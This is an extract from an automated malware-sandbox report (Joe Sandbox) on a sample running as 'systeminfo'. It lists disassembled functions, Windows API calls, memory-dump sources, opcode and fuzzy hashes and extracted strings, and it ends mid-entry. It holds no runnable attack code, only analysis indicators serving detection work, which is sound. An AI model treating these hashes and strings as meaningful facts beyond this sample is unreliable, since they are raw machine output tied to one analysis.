                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                • Opcode ID: cfa8de18d60eee9d5ed61edce85336c37f6a10d2de196f585210e127ddd93cb4
                                                                                                                                                                                • Instruction ID: 5adf082587435cca9a600be6764bbdedf3abf77c07bb0b3d81296e0b2a701388
                                                                                                                                                                                • Opcode Fuzzy Hash: cfa8de18d60eee9d5ed61edce85336c37f6a10d2de196f585210e127ddd93cb4
                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE0DF71380206EEFA109BA4DC0BF643B547B90310F0882A4F889D7282DA21A4048616
                                                                                                                                                                                Function 00568289 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005682BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                • Opcode ID: 1374c31a42c9e127c904cb2fb1c9bdedb603ae4efc798865449a18b510dd228c
                                                                                                                                                                                • Instruction ID: 95321baf76f0b714283838a18c6f61e535fd6b7b23cdc8236320af81881945bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 1374c31a42c9e127c904cb2fb1c9bdedb603ae4efc798865449a18b510dd228c
                                                                                                                                                                                • Instruction Fuzzy Hash: 48E0263D3406002BEB209AB8CC47F723B54BB48360F28C710BC5DCB2C1E938F8024240
                                                                                                                                                                                Function 00568080 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00561CC0,00577F1E,005755DE,00561C8D), ref: 005680B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                • Opcode ID: 4f1cf0d555b21405ccf27fdb9c668af4365f5bb6572fe3779435581a75bd6208
                                                                                                                                                                                • Instruction ID: d004b01ce6e1e9ea0ebc59acb6ea00e2a57504532ae77f5458d3fe6ede2cb6d5
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f1cf0d555b21405ccf27fdb9c668af4365f5bb6572fe3779435581a75bd6208
                                                                                                                                                                                • Instruction Fuzzy Hash: 2CD05E713803057BEA10E6A5DC1BF263A8C6B85760F088468F94DDB2C2ED55F404426A
                                                                                                                                                                                Function 00560DAB Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 00560DBD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                                                                                                • Instruction ID: 656c2341a9919b566bc5f3e3c156013d6dec0903f8f1a71b1156c6c4abe1543b
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                                                                                                • Instruction Fuzzy Hash: DDD0A772B8020C30EB2151905C42FFF7F7C9B81B40F040167FB40F50C1D680240607A5
                                                                                                                                                                                Function 047A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: fd5d1ddfa569985f96f36eeff5d95e64dc571ff65f4dd34e4dfe42c50e3c29fe
                                                                                                                                                                                • Instruction ID: 9cfa53b0c3cd65538f19536f0a62d03619d0fe18e4a8ba536b3fb9545116ecf5
                                                                                                                                                                                • Opcode Fuzzy Hash: fd5d1ddfa569985f96f36eeff5d95e64dc571ff65f4dd34e4dfe42c50e3c29fe
                                                                                                                                                                                • Instruction Fuzzy Hash: B1B09B719015C5C5FB11F7604A0871779046BD0705F16C171D2431671F4738D1D5E5B6

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 046504DE Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 58bf01ac2c174cf1359ed716a5ad3968ca3e4d2ddcd1212da5de6cf0b4ae3094
                                                                                                                                                                                • Instruction ID: 9d76acc9a7c6d8385ecea8bc7f613db16c0d24a7f2664da0f949d1f15be35c90
                                                                                                                                                                                • Opcode Fuzzy Hash: 58bf01ac2c174cf1359ed716a5ad3968ca3e4d2ddcd1212da5de6cf0b4ae3094
                                                                                                                                                                                • Instruction Fuzzy Hash: F141D370618B0D4FE768AF689081676B3E2FB95304F50462DDD8AC3262FA70F8468789
                                                                                                                                                                                Function 0465DF29 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                • API String ID: 0-3558027158
                                                                                                                                                                                • Opcode ID: 783b8036d06e497d3d08686341f50762f06a95b81b1578544af2b324524cb097
                                                                                                                                                                                • Instruction ID: 0ad484977774976fc0001ade6d339b277041370c667a5a7d1da13323455c37fb
                                                                                                                                                                                • Opcode Fuzzy Hash: 783b8036d06e497d3d08686341f50762f06a95b81b1578544af2b324524cb097
                                                                                                                                                                                • Instruction Fuzzy Hash: 139150F04482948EC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                                                                                                Function 047A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 195127ccd90c3c757ad2b4d953240ab094443e52fc8631bfde75afc4e8d88960
                                                                                                                                                                                • Instruction ID: 9e08bd94eaee62862273fff5d468cce62761f8a6b85078b928c18589b511b83e
                                                                                                                                                                                • Opcode Fuzzy Hash: 195127ccd90c3c757ad2b4d953240ab094443e52fc8631bfde75afc4e8d88960
                                                                                                                                                                                • Instruction Fuzzy Hash: DE510DB1B00156BFDB10DFA989C057EF7B8BB48604B108669E495E7742E374FE108BE1
                                                                                                                                                                                Function 04812410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 29bb941442c1e85cca4e0bead817c0f75232c147cbd7e631ba236233457d9f43
                                                                                                                                                                                • Instruction ID: d1a89ccdf3893558da0faeb6cea84c164c1ecd08a68b4feb253614ccf4bb6235
                                                                                                                                                                                • Opcode Fuzzy Hash: 29bb941442c1e85cca4e0bead817c0f75232c147cbd7e631ba236233457d9f43
                                                                                                                                                                                • Instruction Fuzzy Hash: AF51E571A00645AFDB24DF9CC8909BFB7BCEF44204B048D9AE496E7651E6B4FA408760
                                                                                                                                                                                Function 04797630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 047D4742
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 047D4787
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 047D4655
                                                                                                                                                                                • Execute=1, xrefs: 047D4713
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047D46FC
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 047D4725
                                                                                                                                                                                • ExecuteOptions, xrefs: 047D46A0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 141425591db74698c50f46841e20d58e4ae5324779eea13721d4f252443b98f8
                                                                                                                                                                                • Instruction ID: 82d4e67f50d792c4f6c48098876ca9d5d55916bddae94a36562acccd76a6cb3c
                                                                                                                                                                                • Opcode Fuzzy Hash: 141425591db74698c50f46841e20d58e4ae5324779eea13721d4f252443b98f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D51F671650219BAEF14AEA5EC89BBE77FCEB48304F0405A9E505AB381E770BE458F50
                                                                                                                                                                                Function 047AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction ID: 87ce855a3e5bd837902969207766e7da8063222189645461d9a968deb95df7ae
                                                                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction Fuzzy Hash: DE81CF70E052499EDF28CF68C8917FEBBB5AFC5310F18431AEA61A7391D774B8608B51
                                                                                                                                                                                Function 048120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                • Opcode ID: 65368137bc84c73099c7a34fbb44d34c1c95c786eb31c643a6f38c018e423bab
                                                                                                                                                                                • Instruction ID: 727fa5f6db1aba9b7ab56b70bbceb72dc86a6cc88341e2469f737f8f22e2de49
                                                                                                                                                                                • Opcode Fuzzy Hash: 65368137bc84c73099c7a34fbb44d34c1c95c786eb31c643a6f38c018e423bab
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D2151B6E00119ABDB10DFA9C844AEEB7ECEF54744F040656E945E3210EB70FA158BA1
                                                                                                                                                                                Function 0478F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 047D031E
                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047D02E7
                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047D02BD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                • Opcode ID: cf61340a7b94338bbc87ab37d8805fe99b3884cd72033509473a7f6405b5a574
                                                                                                                                                                                • Instruction ID: 4bc4ba1d611ebeababc508c6f3bf89a83d3e60a5d97544602cc05085429a3a95
                                                                                                                                                                                • Opcode Fuzzy Hash: cf61340a7b94338bbc87ab37d8805fe99b3884cd72033509473a7f6405b5a574
                                                                                                                                                                                • Instruction Fuzzy Hash: 71E1BD306547819FE725DF28C884B2AB7E4BB88328F140A5DF5A58B3E1E774F844CB52
                                                                                                                                                                                Function 0479BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 047D7BAC
                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 047D7B7F
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 047D7B8E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                • Opcode ID: 86147496c02fbc0a1edd061ae06a9483f2de3f0e59e4649357765c084cf4f272
                                                                                                                                                                                • Instruction ID: 1ff77976c233b6979f75f28fd956454973004377b7b1fe0287ab1b7b43362bd9
                                                                                                                                                                                • Opcode Fuzzy Hash: 86147496c02fbc0a1edd061ae06a9483f2de3f0e59e4649357765c084cf4f272
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D41D0353007029FDB24DE29E941B6AB7E6FF88714F100A1DE95ADB780EB71F9058B91
                                                                                                                                                                                Function 0479B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047D728C
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 047D72C1
                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 047D7294
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 047D72A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                • Opcode ID: 46bf0aa6960dc8997b1c3d702d8613c43ca9b66c2689d9b3c71b8e7c4fd26147
                                                                                                                                                                                • Instruction ID: cebd585bf2c97341f77f5440ccc7f3884a3a2bc5c9355a4f8f71c9665e2096eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 46bf0aa6960dc8997b1c3d702d8613c43ca9b66c2689d9b3c71b8e7c4fd26147
                                                                                                                                                                                • Instruction Fuzzy Hash: A3410032700246ABDB24DE25DD42B6AB7F5FB88714F100A19FA55EB340EB31F8529BD1
                                                                                                                                                                                Function 04812300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                • Opcode ID: 627613843629ca5eb3e985906a9dfd943ea91b5a39314cd9e33cf16ce0088dc9
                                                                                                                                                                                • Instruction ID: ab5e8ebb3fc8a1c3fc1554636fd2f2a6edc8634e310c6b70dfc0b3dcb9d8b46d
                                                                                                                                                                                • Opcode Fuzzy Hash: 627613843629ca5eb3e985906a9dfd943ea91b5a39314cd9e33cf16ce0088dc9
                                                                                                                                                                                • Instruction Fuzzy Hash: F5315772A002199FDB24DE2DDC40BEEB7BCEF44754F444996E849E3250EB30BA558BA1
                                                                                                                                                                                Function 04653AAE Relevance: 6.3, Strings: 5, Instructions: 67COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: /e)$$0$:!$age=$qz9A
                                                                                                                                                                                • API String ID: 0-1418462814
                                                                                                                                                                                • Opcode ID: c174832a5115f4541122311bea2df09388683f009847876670376b89c78c542e
                                                                                                                                                                                • Instruction ID: 8be0e4880b6c4b78c951548ea25ce86b4770404534c5b55abe6f4e99dd245992
                                                                                                                                                                                • Opcode Fuzzy Hash: c174832a5115f4541122311bea2df09388683f009847876670376b89c78c542e
                                                                                                                                                                                • Instruction Fuzzy Hash: C4117830028B844ACB05AB10C41469ABBE1FFD931DF900B5CECC9DB261EA38D385C74B
                                                                                                                                                                                Function 04653C22 Relevance: 6.3, Strings: 5, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GQZ$VW\F$V]EA$Y]$^[YW
                                                                                                                                                                                • API String ID: 0-3218079648
                                                                                                                                                                                • Opcode ID: 0b45a212d8b2b0cc3f5515fd12286ee571d956451be18484cb5e6fc4ed393a1a
                                                                                                                                                                                • Instruction ID: ade3f8976da7fae0f022d3a1a73e1c74011823da135264843c8cdf99d4308e13
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b45a212d8b2b0cc3f5515fd12286ee571d956451be18484cb5e6fc4ed393a1a
                                                                                                                                                                                • Instruction Fuzzy Hash: 6921F0B180068C8ACF15DFD1D5486EDBFB4FB04308F608598C0AAAF256D735454ADF89
                                                                                                                                                                                Function 047A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
